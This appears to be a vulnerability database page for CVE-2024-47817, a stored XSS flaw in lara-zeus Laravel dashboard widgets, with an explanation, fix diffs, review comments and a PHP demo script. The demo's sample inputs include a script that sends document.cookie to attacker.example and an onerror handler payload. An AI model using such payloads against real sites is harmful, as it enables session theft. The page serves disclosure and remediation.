CVE-2024-47817
Description
Lara-zeus Dynamic Dashboard paragraph widget fails to sanitize user input, allowing stored XSS via crafted values.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Root Cause
CVE-2024-47817 is a stored cross-site scripting (XSS) vulnerability in the Lara-zeus Dynamic Dashboard and Artemis theme packages. The widget view writes user-supplied content into the page with Blade's unescaped echo syntax, {!! $data['content'] !!}, in the another-portfolio, breeze and daisy themes [3][4]; in the zeus theme the content was already passed through Markdown, which on its own did not neutralise injected markup, as the follow-up patch that adds strip_tags() shows. Because nothing escapes or strips the value before it is echoed, any HTML or JavaScript an attacker can store in the widget is rendered verbatim into the page.
Exploitation
An attacker who can set the content of a paragraph widget, for example through the widget configuration screen or a form that populates it, stores a value containing a script payload. The payload is persisted with the widget and executes in the browser of every user who later views the page that renders it. No privilege beyond the ability to edit widget content is needed, and the victims are whoever visits the affected page, administrators included.
Impact
Successful exploitation lets an attacker run JavaScript in the victim's session: read session cookies that are not marked HttpOnly, redirect the user to attacker-controlled sites, or perform actions on the victim's behalf within the Laravel application. The CVSS v3 base score is 6.1 (Medium), reflecting the need for user interaction (a victim must view the page) and the limited impact on confidentiality and integrity.
Mitigation
Patches have been released in the referenced commits. The fix passes the widget content through strip_tags() before converting it to Markdown, so injected HTML elements (script tags, elements carrying event-handler attributes) are removed before the template's unescaped {!! !!} echo emits the result. strip_tags() removes tags but does not escape the text that remains, so the hardening relies on the Markdown converter for the rest. Users should upgrade to lara-zeus/dynamic-dashboard 3.0.2 and lara-zeus/artemis 1.0.7 or later, as specified in the advisory. No workarounds are available [1].
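As an added example (not code from the lara-zeus packages or from the advisory), the following stand-alone PHP script contrasts the three rendering paths for a widget value that the root cause and mitigation sections describe: the unescaped Blade echo, Blade's default escaped echo, and the strip_tags() step the fix commits add. The Markdown conversion from the patch is omitted because it needs league/commonmark; the sample values and the attacker.example hostname are constructed for the demonstration, and keepsActiveMarkup() is a hypothetical check written here, not a library function.

```php
<?php
declare(strict_types=1);

// Added example for this page; not code from lara-zeus/dynamic-dashboard or lara-zeus/artemis.
// Emulates the three ways a widget's content can reach the page:
//   renderRaw      - Blade {!! $data['content'] !!}, the pattern the advisory describes
//   renderEscaped  - Blade {{ $data['content'] }}, which calls e() -> htmlspecialchars()
//   renderStripped - strip_tags() before echoing, as in the fix commits (the Markdown step
//                    the patch adds afterwards needs league/commonmark and is left out here)

function renderRaw(string $content): string
{
    return '<div class="py-4">' . $content . '</div>';
}

function renderEscaped(string $content): string
{
    // Same flags Laravel's e() helper passes to htmlspecialchars().
    $escaped = htmlspecialchars($content, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="py-4">' . $escaped . '</div>';
}

function renderStripped(string $content): string
{
    return '<div class="py-4">' . strip_tags($content) . '</div>';
}

/**
 * Hypothetical check used only for this demonstration: parse the rendered fragment
 * and report whether a <script> element or any on*= event-handler attribute survived.
 * Parsing (rather than regex) means entity-escaped text such as &lt;script&gt; is
 * correctly treated as inert text, not as markup.
 */
function keepsActiveMarkup(string $html): bool
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);            // silence warnings on odd fragments
    $doc->loadHTML('<?xml encoding="UTF-8">' . $html);
    libxml_clear_errors();

    if ($doc->getElementsByTagName('script')->length > 0) {
        return true;
    }
    foreach ($doc->getElementsByTagName('*') as $element) {
        foreach ($element->attributes as $attribute) {
            if (stripos($attribute->name, 'on') === 0) {   // onerror, onload, onclick, ...
                return true;
            }
        }
    }
    return false;
}

// Constructed sample values. Assumption: an attacker who can edit widget configuration
// stores them, as the advisory describes; attacker.example is a placeholder host.
$samples = [
    'benign'  => 'Welcome to the dashboard',
    'script'  => '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
    'handler' => '<img src=x onerror="alert(document.domain)">',
];

foreach ($samples as $name => $value) {
    printf(
        "%-8s raw:%-6s escaped:%-6s stripped:%-6s\n",
        $name,
        keepsActiveMarkup(renderRaw($value))      ? 'XSS' : 'inert',
        keepsActiveMarkup(renderEscaped($value))  ? 'XSS' : 'inert',
        keepsActiveMarkup(renderStripped($value)) ? 'XSS' : 'inert'
    );
}
```

Run it with `php widget_xss.php` (the file name is arbitrary). The raw column is the only one where the script and handler samples produce live markup: escaping turns the tags into entity text, and strip_tags() removes the elements outright, leaving for the script sample only the inert JavaScript source as plain text. That residue is the caveat from the mitigation section: strip_tags() removes tags, it does not sanitise or escape whatever text is left.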
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package (Packagist) | Affected versions | Patched versions |
|---|---|---|
| lara-zeus/dynamic-dashboard | >= 3.0.0, < 3.0.2 | 3.0.2 |
| lara-zeus/artemis | >= 1.0.0, < 1.0.7 | 1.0.7 |
Affected products
Two version ranges from the GHSA coordinates; no CPE is assigned to either.
- (no CPE) range: >= 1.0.0, < 1.0.7 (lara-zeus/artemis)
- (no CPE) range: >= 3.0.0, < 3.0.2 (lara-zeus/dynamic-dashboard)
Patches
3 files changed · +24 −6
resources/views/themes/another-portfolio/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/breeze/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/daisy/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
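Review bot: in all three hunks (another-portfolio, breeze, daisy) the result of `str(strip_tags(...))->markdown()` is still emitted through the unescaped `{!! !!}` echo, so the whole defence is strip_tags() removing the elements; nothing escapes the text that survives. If the widget is meant to hold plain text, the escaped echo `{{ $data['content'] }}` is the simpler and safer change and needs no Markdown step. Two smaller points: the wrapper change from `py-4` to the `prose` class set is a presentation change bundled into a security fix and deserves a mention in the commit message, and the advisory describes a paragraph widget while every file touched here is HeadingWidget.blade.php, so confirm that each view echoing `$data['content']` unescaped was updated.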
adfb4b1cdfda Merge pull request #42 from lara-zeus/hot-fix
4 files changed · +69 −8
docs/assets.md+55 −0 added@@ -0,0 +1,55 @@ +--- +title: Themes and Assets +weight: 6 +--- + +## Compiling assets + +we use [tailwind Css](https://tailwindcss.com/) and custom themes by filament, make sure you are familiar with [tailwindcss configuration](https://tailwindcss.com/docs/configuration), and how to make custom [filament theme](https://filamentphp.com/docs/2.x/admin/appearance#building-themes). + +### Custom Classes: + +You need to add these files to your `tailwind.config.js` file in the `content` section. + +* frontend: + +```js +content: [ + //... + './vendor/lara-zeus/dynamic-dashboard/resources/views/themes/**/*.blade.php', + './vendor/lara-zeus/dynamic-dashboard/src/Models/Columns.php', +] +``` + +* filament: + +```js +content: [ + //... + './vendor/lara-zeus/rain/resources/views/filament/**/*.blade.php', + './vendor/lara-zeus/rain/src/Models/Columns.php', +] +``` + +### Customizing the Frontend Views + +first, publish the config file: + +```php +php artisan vendor:publish --tag=zeus-config +``` + +then change the default layout in the file `zeus.php`: + +```php +'layout' => 'components.layouts.app', +// this is assuming your layout on the folder `resources/views/components/layouts/app` +``` +this will give you full control for the assets files and the header and the footer. + + +If needed, you can publish the blade views for all zeus packages: + +```php +php artisan vendor:publish --tag=zeus-views +```
.github/workflows/phpstan.yml+1 −1 modified@@ -16,7 +16,7 @@ jobs: - name: Setup PHP uses: shivammathur/setup-php@v2 with: - php-version: '8.1' + php-version: '8.2' coverage: none - name: Install composer dependencies
.github/workflows/run-tests.yml+6 −6 modified@@ -13,12 +13,12 @@ jobs: fail-fast: true matrix: os: [ubuntu-latest, windows-latest] - php: [8.1] - laravel: [9.*] - stability: [prefer-lowest, prefer-stable] + php: [8.2] + laravel: [10.*] + stability: [prefer-stable] include: - - laravel: 9.* - testbench: 7.* + - laravel: 10.* + testbench: 8.* name: P${{ matrix.php }} - L${{ matrix.laravel }} - ${{ matrix.stability }} - ${{ matrix.os }} @@ -44,4 +44,4 @@ jobs: composer update --${{ matrix.stability }} --prefer-dist --no-interaction - name: Execute tests - run: vendor/bin/pest + run: vendor/bin/pest \ No newline at end of file
resources/views/themes/zeus/dynamic-dashboard/widgets/HeadingWidget.blade.php+7 −1 modified@@ -1,3 +1,9 @@ <div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> - {!! str($data['content'])->markdown() !!} + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
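Review bot: only the zeus HeadingWidget.blade.php hunk is security-relevant in this four-file commit; the docs/assets.md addition, the PHP 8.1 to 8.2 bump in phpstan.yml and the Laravel 10 / testbench 8 matrix change in run-tests.yml are unrelated, and bundling them into the hot-fix makes the fix harder to cherry-pick onto older branches and to review (dropping `prefer-lowest` from the stability matrix also quietly removes lowest-dependency test coverage). On the Blade hunk itself: the removed line already ran `->markdown()` on the raw content, so the Markdown conversion by itself evidently did not neutralise injected markup and `strip_tags()` is the actual fix. Since `->markdown()` accepts an options array, consider also passing an explicit `html_input` setting so the converter's treatment of any inline HTML does not depend on its defaults.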
4636f58628d2 Merge pull request #23 from lara-zeus/fix-blade
3 files changed · +24 −6
resources/views/themes/another-portfolio/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/breeze/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
resources/views/themes/daisy/rain/widgets/HeadingWidget.blade.php+8 −2 modified@@ -1,3 +1,9 @@ -<div class="py-4"> - {!! $data['content'] !!} +<div class="max-w-none p-4 prose lg:prose-xl prose-primary dark:prose-invert"> + {!! + (new \Illuminate\Support\HtmlString( + str(strip_tags($data['content'])) + ->markdown() + )) + ->toHtml() + !!} </div>
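Review bot: these three hunks are identical to the three in the first patch block above, so the same points apply; two further style points on the replacement expression. `str(...)->markdown()` already returns a string that `{!! !!}` echoes as-is, so wrapping it in `new \Illuminate\Support\HtmlString(...)` and calling `->toHtml()` changes nothing and only lengthens each view; `{!! str(strip_tags($data['content']))->markdown() !!}` is equivalent. And if `$data['content']` can be absent for a freshly created widget, `strip_tags()` receives null, which PHP 8.1 and later report as a deprecation; `strip_tags($data['content'] ?? '')` avoids that.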
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] github.com/advisories/GHSA-c6cw-g7fc-4gwc (source: ghsa; type: advisory)
[2] nvd.nist.gov/vuln/detail/CVE-2024-47817 (source: ghsa; type: advisory)
[3] github.com/lara-zeus/artemis/commit/3a3f9dd8a706af569c5581b20dcfeff91a43b9d9 (source: nvd; type: web)
[4] github.com/lara-zeus/artemis/commit/4636f58628d20d3e78ea8514406bd7da94997f2c (source: ghsa; type: web)
[5] github.com/lara-zeus/dynamic-dashboard/commit/adfb4b1cdfdaa01299631f0e569ce201a7cc545a (source: nvd; type: web)
[6] github.com/lara-zeus/dynamic-dashboard/security/advisories/GHSA-c6cw-g7fc-4gwc (source: nvd; type: web)